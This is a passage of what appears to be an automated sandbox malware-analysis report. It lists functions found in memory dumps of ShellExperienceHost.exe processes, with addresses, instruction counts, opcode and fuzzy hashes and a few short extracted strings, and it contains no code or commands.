Opcode ID: 52faf6c976bd3f83ceb1538119d687ab1f0677284914b89bea4640b90c566c3a
Instruction ID: 75b9ca5989f8b0df8a95ab17464637c8f4b216d8d4b184a992e3af85f4660989
Opcode Fuzzy Hash: 52faf6c976bd3f83ceb1538119d687ab1f0677284914b89bea4640b90c566c3a
Instruction Fuzzy Hash: 6DF0F970D1C41A8EEBA4EB188884BF973B1EB68740F1046B6D40DE2186DF38A9818B44

Function 00007FF848F427ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e50a5811cbdc471e2b8b146f7e9f3871c56d5d2d0dfe0815c184710bc2328291
Instruction ID: 3d82c1f16429dbfe1a4e0331e74964681c792b16359703ef829687e143513785
Opcode Fuzzy Hash: e50a5811cbdc471e2b8b146f7e9f3871c56d5d2d0dfe0815c184710bc2328291
Instruction Fuzzy Hash: 7CF09A3180E78E8FEB5AAB6488192BD7BA0FF25641F5404BBE809C61E2EB399454C741

Function 00007FF848F54000 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f54000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a129e37868af20348f0edbba32c02a957cba23caef0fce01ca39444675331283
Instruction ID: bf0453ba2d25cc62f0a3cdb2dff26c046f1fdd43709cf8617fa548bfdcb8d9b4
Opcode Fuzzy Hash: a129e37868af20348f0edbba32c02a957cba23caef0fce01ca39444675331283
Instruction Fuzzy Hash: D6F0F871D4851E9EEB91FB68C4495BAB6E4EF28341F504972D40DC7196EB34E1448604

Function 00007FF848F4BD69 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f47000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8e594106a25a8e1a7aa03fa3658366f1355d7daf26294898e8867d5922d5df
Instruction ID: e25842cb2e92da018e05fed86837f3305ba0b4d32d10bb77ab3af48fa8476b88
Opcode Fuzzy Hash: bd8e594106a25a8e1a7aa03fa3658366f1355d7daf26294898e8867d5922d5df
Instruction Fuzzy Hash: 29F07970D1851E8EEBA0EB54C8457ACB6B1FF54641F4045F6910DF2292DF341E848F14

Function 00007FF848F42450 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d504cb188f9ac6bd6aa3c5d1fa74d503509be9ba1b11a552a60728ede4745a7
Instruction ID: 71559a6a4d39d4f61dc20454195eb4759467696c4381ded755f6415b2be8a7b9
Opcode Fuzzy Hash: 3d504cb188f9ac6bd6aa3c5d1fa74d503509be9ba1b11a552a60728ede4745a7
Instruction Fuzzy Hash: C1F0BB309085298EEBA0FB20C845BE8B2B1EB64741F1041BAC40DA62A2DF746A948B45

Function 00007FF848F517CC Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f51000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39fc93cdaa750ccbcf0f0d407a30b34f1ead6ce3cdda4e0ad9a88df3a9f995b5
Instruction ID: 1bcba12319512e6d46f5bdc336df35fe1ddab82ff067cbea0052d3faa2d73278
Opcode Fuzzy Hash: 39fc93cdaa750ccbcf0f0d407a30b34f1ead6ce3cdda4e0ad9a88df3a9f995b5
Instruction Fuzzy Hash: EEF03035E0D2298FCB98DF14D8946FDB7A5EF81350F1040B9D10D97292CB341A98CB45

Function 00007FF848F52438 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f51000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b14dd6a62cfa414f4f93c563904a540db2201fb0653af32e3c92dd20e470fb
Instruction ID: de3925e64513eff9a274f0ad14f35ba360316ec50c08d4d22406089ca02faeba
Opcode Fuzzy Hash: e6b14dd6a62cfa414f4f93c563904a540db2201fb0653af32e3c92dd20e470fb
Instruction Fuzzy Hash: 69E0123090D506CFEB10EB84C5449EEB3E1EB55352F104266D405A62C5FF396D848E98

Function 00007FF848F5580B Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f54000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a29567b26d51f725d8734d226b2171764d62e1501f5115ba87ded49f5440df3
Instruction ID: 1d13dd26720e594acca0ba140d3a2850d13268f982fa794385f74f08b5dc48df
Opcode Fuzzy Hash: 2a29567b26d51f725d8734d226b2171764d62e1501f5115ba87ded49f5440df3
Instruction Fuzzy Hash: 60D0C971C19B0A9FE744EF5884896A8BBE1FB54748B10016AC019D3285DF34E4015B40

Non-executed Functions

Function 00007FF848F4387E Relevance: 5.1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

Strings

/p]I, xrefs: 00007FF848F43924
.p]I, xrefs: 00007FF848F43954
8p], xrefs: 00007FF848F438D4
0p]I, xrefs: 00007FF848F43944

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: .p]I$/p]I$0p]I$8p]
API String ID: 0-2657320912
Opcode ID: 1b81c53d8f4713e75bae425a7182323f848d7fc8dd2673c19a7a032ef02e6086
Instruction ID: f538b549aec9742a424834ba03f0c8621193a2d9c35acc59d98b64b4d86831b0
Opcode Fuzzy Hash: 1b81c53d8f4713e75bae425a7182323f848d7fc8dd2673c19a7a032ef02e6086
Instruction Fuzzy Hash: 7831C06381E7C25FE30397781C24A61BFA0EF63A9071945FBC184DB1E7D509990EC3A2

Function 00007FF848F51609 Relevance: 5.1, Strings: 4, Instructions: 84COMMON

Download Yara Rule

Strings

#, xrefs: 00007FF848F51C66
/, xrefs: 00007FF848F514A9
-, xrefs: 00007FF848F51CAD
!, xrefs: 00007FF848F5164D

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f51000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: !$#$-$/
API String ID: 0-2869350023
Opcode ID: 8f7e534a81cca90ceebaf2eaa711daa374d5a11e820c55bf5d5d88dd7dba4133
Instruction ID: e72aaa95e0351fd20143210dcf2a47ab0f81b7b73981a439e5a36ecec40b4df5
Opcode Fuzzy Hash: 8f7e534a81cca90ceebaf2eaa711daa374d5a11e820c55bf5d5d88dd7dba4133
Instruction Fuzzy Hash: E231A470D096198FEBA8EF14C8A47EDB7B1FB59345F2041A9D40DE7292CB356A81CF44

Function 00007FF848F4F3C5 Relevance: 5.0, Strings: 4, Instructions: 43COMMON

Download Yara Rule

Strings

!, xrefs: 00007FF848F4F3CF
,, xrefs: 00007FF848F4F262
\, xrefs: 00007FF848F4F255
2, xrefs: 00007FF848F4F438

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F4F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f4f000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: !$,$2$\
API String ID: 0-4146109853
Opcode ID: 98a57dbb52fa9934f178916ef1d47e2aab21d40f8affbdd94a0d92e081ae345d
Instruction ID: 08ee9bb0921fae01cd459f13bd987606d713beaca97764e56c5f27ab975c4848
Opcode Fuzzy Hash: 98a57dbb52fa9934f178916ef1d47e2aab21d40f8affbdd94a0d92e081ae345d
Instruction Fuzzy Hash: 02111F70D0861E8FDB64DF54D8847AEB7B2EFA4351F1041A9D44D62285CB385981CF55

Analysis Process: ShellExperienceHost.exePID: 7560, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F33565 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c8249e02e2258b684bb96a497dae4e87409b69ff6a312e2ea2591c93dbfbacf
Instruction ID: 606c3863ee151318474f3157ccf5fcea61110d9e30c7cb1579a2899e5adfe70b
Opcode Fuzzy Hash: 3c8249e02e2258b684bb96a497dae4e87409b69ff6a312e2ea2591c93dbfbacf
Instruction Fuzzy Hash: 3F91BF31E1C94A9FEB84EB6CD8197A9BBE1FF99350F50417AC00DC32C6DF6928058755

Function 00007FF848F41440 Relevance: 2.6, Strings: 2, Instructions: 51COMMON

Download Yara Rule

Strings

., xrefs: 00007FF848F4145A
/, xrefs: 00007FF848F414A9

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f41000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: .$/
API String ID: 0-2544594439
Opcode ID: a26f53201ed534dfe1f92f50b0e6aff985ba132be7222aa2f453d561485b3c6d
Instruction ID: c0fc9f4139c2d3778570ca27e70bcea68afdb8baaff333caedb588fe1501709e
Opcode Fuzzy Hash: a26f53201ed534dfe1f92f50b0e6aff985ba132be7222aa2f453d561485b3c6d
Instruction Fuzzy Hash: 5C119A34E09329CFDB24DB80C8547ECB3B1EF51760F2042AAD00DAB2E1DB781A88CB44

Function 00007FF848F47A45 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF848F47A59

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F44000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F44000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f44000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: cba8679926be6fff365062d0ae81dd1c651640c3260321dd070fd32f77e9c118
Instruction ID: a57754937806bd75dd8f45be4999df18eed8e12270f91c219e4c525b4b52684c
Opcode Fuzzy Hash: cba8679926be6fff365062d0ae81dd1c651640c3260321dd070fd32f77e9c118
Instruction Fuzzy Hash: DD410570D0861E8FEB54EFA4D4947ECBAF0AF58350F14053AD009F62D1DB78A988CB59

Function 00007FF848F30A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

(vH, xrefs: 00007FF848F30A70

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: (vH
API String ID: 0-1172161155
Opcode ID: b967188be5bd4b85d02b105245b3b4ad11f33451b1154a70fad1fe74bcca36c5
Instruction ID: d0793ea18a3da9f85008f6cd684ed1c12bfaecdf1cf51d58354fbd7d91bacb85
Opcode Fuzzy Hash: b967188be5bd4b85d02b105245b3b4ad11f33451b1154a70fad1fe74bcca36c5
Instruction Fuzzy Hash: 5B116A31D0954E9FEB80FB68D8492BD7BE0FF98380F4045B7D809C6192EF38A5448700

Function 00007FF848F3123D Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F312AD

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: a96ddc63d2fb94f22fc41f3360f1d7279796e2e0bffe8418a4b66ec3aa6addde
Instruction ID: 290acf658cca8dc0c66c830248308d34956d0ba9864ef840f0e50c5ff9e06227
Opcode Fuzzy Hash: a96ddc63d2fb94f22fc41f3360f1d7279796e2e0bffe8418a4b66ec3aa6addde
Instruction Fuzzy Hash: 1811BF30D0D64E8EEB99FB6884592B97BE0FF5A341F0405BBE00AD60D2EF29A480C710

Function 00007FF848F31250 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F312AD

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 9d77a371624e10987eb50789188452511df43a60edb5fd8c61f44d310b69c56a
Instruction ID: 3a47028c1ba5373cc14021c02d64e15605f368ab4087a8cda02422b6c7b2444a
Opcode Fuzzy Hash: 9d77a371624e10987eb50789188452511df43a60edb5fd8c61f44d310b69c56a
Instruction Fuzzy Hash: 3AF0AF30D1D65F8EEB98BB6898182BA77E4FF56355F04067BE40DE20D1EF2855948214

Function 00007FF848F3FD2D Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

/, xrefs: 00007FF848F3FD4B

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F3F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f3f000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: abfaca1340e5fa52885e9b5c6a494372cc09fb373e3e002210ee3d8dff2d3142
Instruction ID: 51e866d008b21be42361a7a7c2d0d277bec1cd4bc810730387eb40f969d63c1f
Opcode Fuzzy Hash: abfaca1340e5fa52885e9b5c6a494372cc09fb373e3e002210ee3d8dff2d3142
Instruction Fuzzy Hash: 6DD0CEB0D1855D8FDBA4EF14C4557B976B1AF54340F1001BA950DE3291CF7469848F55

Function 00007FF848F305A0 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44196e642d37e5e21a4d02240d9dc00d21333f695cd7b9b9ce7a9fe7a5e00052
Instruction ID: 0b546b945578facbfb93ed83d645f71dba9e17b3725fd016ee186a56744c3d4a
Opcode Fuzzy Hash: 44196e642d37e5e21a4d02240d9dc00d21333f695cd7b9b9ce7a9fe7a5e00052
Instruction Fuzzy Hash: 61911723D0F5D68EE255B77C78161FA6BA0FF926A4F0C43F7D4888A0DBDE1C54068299

Function 00007FF848F30638 Relevance: .3, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c8aeeeaa1d0469f37d76708fd2032f5489e95d544d343c158e23d4938d0681c
Instruction ID: e64df5c30b9d05bc1e5d26d7605458583aefe9167817f468ab68896302ab109b
Opcode Fuzzy Hash: 3c8aeeeaa1d0469f37d76708fd2032f5489e95d544d343c158e23d4938d0681c
Instruction Fuzzy Hash: 2E81E623D0E5D68EE255B77C78161F97BA0FF927A4F0843F7D4888A0DBDE2C54068299

Function 00007FF848F30615 Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a54502f59a2ed55e397ab05d22030b35b3ec3ea3789e046570ff9563dbc5d2eb
Instruction ID: 7c21c9f4d9e739dd6afd1be03f233313507177f8ac6e8fcb86d3fb2c81f036da
Opcode Fuzzy Hash: a54502f59a2ed55e397ab05d22030b35b3ec3ea3789e046570ff9563dbc5d2eb
Instruction Fuzzy Hash: 46810823D0F5D68EE255B77C78161F96F90FF926A4F0C42F7D4888A0DBDE1C54068299

Function 00007FF848F305ED Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 223a9a61b2983b1f8967c20d6b32b22671e7096dc5482ebf02489cf290881198
Instruction ID: 2d8fa828dbada210dc563190a8fe481cdb0565fec256f0b6b358635202cd1de9
Opcode Fuzzy Hash: 223a9a61b2983b1f8967c20d6b32b22671e7096dc5482ebf02489cf290881198
Instruction Fuzzy Hash: 4F812723D0F6D68FE215777C78161F97BA0FF926A4F0C42B7D4888A0D7DE1C540A8299

Function 00007FF848F316D8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89f974c313def7ecacb4fcf2a0fd0a0310764a02ea5b76bee2b33862511e9927
Instruction ID: 7895fe8b23ee93c959a6ea43536cfb7efe1f00c63bd884dfc9e25d3bc6cf9ce1
Opcode Fuzzy Hash: 89f974c313def7ecacb4fcf2a0fd0a0310764a02ea5b76bee2b33862511e9927
Instruction Fuzzy Hash: A281AD31A0CA4A8FDB58EB2888555B977E2FF99740F1445BAE44DC32C6CF24AC42C785

Function 00007FF848F30640 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85a00e05cfc10e4e8764e45685b9ea1910295cc4da6026d750345e10c649f7c1
Instruction ID: 6a609fc65032d368bdde3cc1889ca0fcf92c99d7003d081c64de0601675e9f9c
Opcode Fuzzy Hash: 85a00e05cfc10e4e8764e45685b9ea1910295cc4da6026d750345e10c649f7c1
Instruction Fuzzy Hash: 8271E723D0F6D68EE255777C78161F96BA0FF926A4F0C42F7D4888A0DBDE1C54068299

Function 00007FF848F3C5A9 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F37000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f37000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd2b8d43609b75663a3cb6cfca00ba288a62b94798a8b0bce5bb3d6a0530cad7
Instruction ID: 150173f4012a072cb5ec9f4226f3b41be79ac1c128953c5fd5a0d21108b6e28b
Opcode Fuzzy Hash: bd2b8d43609b75663a3cb6cfca00ba288a62b94798a8b0bce5bb3d6a0530cad7
Instruction Fuzzy Hash: 44613770D0C60E8FEB94EBA884546EDB7B1EF59340F50117AD40DE72C2EF38A9508B58

Function 00007FF848F31D2D Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fc777972c882e2696a0287c527cdf2b300247680369b327a0abdaffde273b66
Instruction ID: 14c886f3350b4ae35af8e05114b7bc38b424109ab6ee97ea53d80bf52ea5ff3c
Opcode Fuzzy Hash: 6fc777972c882e2696a0287c527cdf2b300247680369b327a0abdaffde273b66
Instruction Fuzzy Hash: A351B131A0CA9A8FDB48EF1888545BA77E2FB98340F14457EE44AC7295CF34E842C785

Function 00007FF848F33165 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eab45ed1efa82cfe6fbc5c20614fff1fd08a34731fd002c6f2b739592e33a77f
Instruction ID: c77b124167ef008a338ce9d978bb2143c2e1e53666b11cbad2859b229bd4943d
Opcode Fuzzy Hash: eab45ed1efa82cfe6fbc5c20614fff1fd08a34731fd002c6f2b739592e33a77f
Instruction Fuzzy Hash: CC512570D0860D8FEB54EBA8E4596EDBBB1FF58341F40417AD00AE72D2DB38A945CB54

Function 00007FF848F32145 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0ef979e1d682238ad1f17ec7f2239bf463b1b40ff0d20d564001958a283a013
Instruction ID: 70345104915df5b07bdb58e1dcf8c44c30b4850c542cf332d6aca67bd2a87205
Opcode Fuzzy Hash: b0ef979e1d682238ad1f17ec7f2239bf463b1b40ff0d20d564001958a283a013
Instruction Fuzzy Hash: A9413531E1DA8A4FE346FB7898491B8BBE0EF4A391F0501BBD40DC71D2DF28A8418365

Function 00007FF848F3B33D Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F37000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f37000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f6dbc064a5edaeea1b77349a27ee3094bf2146c0af3a6e72a7f46ad0fe1c1a7
Instruction ID: c7f2bfe911a29b6bd942347b88d020ddaa7ec766a15fd20a4983454109f693fd
Opcode Fuzzy Hash: 5f6dbc064a5edaeea1b77349a27ee3094bf2146c0af3a6e72a7f46ad0fe1c1a7
Instruction Fuzzy Hash: BB41CC71E2C95A9EE742FB6898692F97BE0FF5A351F0444B7D40CC60D2EF28A451C358

Function 00007FF848F3CDFB Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F37000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f37000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec4656fb0a82348180b720eef19a65e0776acbbf421efd22dd3dc2b83abe8710
Instruction ID: 76e6b2866f089a91e3f2e92d680fb3f280e051ab2cde0cfd5d2a078e4b3f7085
Opcode Fuzzy Hash: ec4656fb0a82348180b720eef19a65e0776acbbf421efd22dd3dc2b83abe8710
Instruction Fuzzy Hash: 18217E32E1E55A9EEB967BACA4051FD37A0FF513B5F440237D50C890C2EF2C64A186AD

Function 00007FF848F3C69D Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F37000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f37000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9895c7eefbda5ea5fd8f1f860a68ba0ba59276b62c6047bba0e35607934657f2
Instruction ID: 1730f1aaa1f4901a00647054e73f89f07d4fabbbbcab0a5a013be3b39fcec0d9
Opcode Fuzzy Hash: 9895c7eefbda5ea5fd8f1f860a68ba0ba59276b62c6047bba0e35607934657f2
Instruction Fuzzy Hash: 4331C530E1C91D8FEB94FBA898956BDBBB1FF99340F50117AD40DE7282DF2468418B44

Function 00007FF848F30805 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cd99bf60dd5dcddfaddb7f3016715e07e101f1d311586b0b32aecb8c9b3a145
Instruction ID: ae0410b5d92b7848b5ed78cf993255e716355288a64f90b217594aef2e5edabf
Opcode Fuzzy Hash: 6cd99bf60dd5dcddfaddb7f3016715e07e101f1d311586b0b32aecb8c9b3a145
Instruction Fuzzy Hash: 03212672D1EA869FE344777CA85A1EA7BD0FF91399F080177D448C90C3EE08A156C2D5

Function 00007FF848F3CD68 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F37000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f37000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf27de6be6915d4b0c24607e4cef4b3de9b899113878d1038a6fae161f9e025a
Instruction ID: 0fc628697bff10d759f3ba747f85002e2a198882aba9704664b1a26ec8782f09
Opcode Fuzzy Hash: bf27de6be6915d4b0c24607e4cef4b3de9b899113878d1038a6fae161f9e025a
Instruction Fuzzy Hash: 35210537A1D52AAADB50776DF8404EE7760FF803B5B000237D609CA0C2EB25B85987E4

Function 00007FF848F33294 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f30000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f048c26e02c0c3245466ed355238fb045e920de2b0ede30ff0ed3785c8492598
Instruction ID: 2b3f219d07454b5999ec044fc15261c6ab3541060b9fc85ac87a2f2c13cfd73c
Opcode Fuzzy Hash: f048c26e02c0c3245466ed355238fb045e920de2b0ede30ff0ed3785c8492598
Instruction Fuzzy Hash: A521D270D0891D8FEB94EB98D494AECBBF1FB98351F50407AD00AE72D5DB386944CB54

Function 00007FF848F3A9B1 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2204908453.00007FF848F37000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F37000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f37000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff32f4965680dd14f69c1366c20c656f0d1561fa82e33a36fef895df2ab2765
Instruction ID: c2386db6b8ccb2a7252f71953ae28995a9a6cd95d32b05152c2453531b51583f
